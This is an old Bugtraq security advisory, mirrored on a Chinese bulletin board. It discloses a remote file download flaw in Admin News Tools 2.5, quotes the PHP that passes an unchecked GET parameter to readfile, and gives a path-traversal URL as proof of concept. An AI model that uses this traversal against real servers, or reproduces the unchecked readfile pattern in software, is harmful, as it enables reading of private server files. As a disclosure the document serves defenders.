Admin News Tools 2.5 Remote File Download Vulnerability

看板Bugtraq作者info.時間16年前 (2009/07/18 11:28)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串1/1

######################### Securitylab.ir ######################## # Application Info: # Name: Admin News Tools # Version: 2.5 # Website: http://www.adminnewstools.fr.nf # Download: http://www.adminnewstools.fr.nf/zip/ANT-2.5.zip ################################################################# # Discoverd By: Securitylab.ir # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir ################################################################# # Vulnerability Info: # Type: Remote File Download Vulnerability # Risk: Medium #=========================================================== # Download.php # header('Content-Disposition: attachment; filename=' . basename ($_GET['fichier'])); # readfile($_GET['fichier']); # } # # http://www.site.com/news/system/download.php?fichier=./../up.php #=========================================================== ################################################################# # Securitylab Security Research Team ###################################################################

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 info. 的文章

文章代碼(AID): #1AOK5D0x (Bugtraq)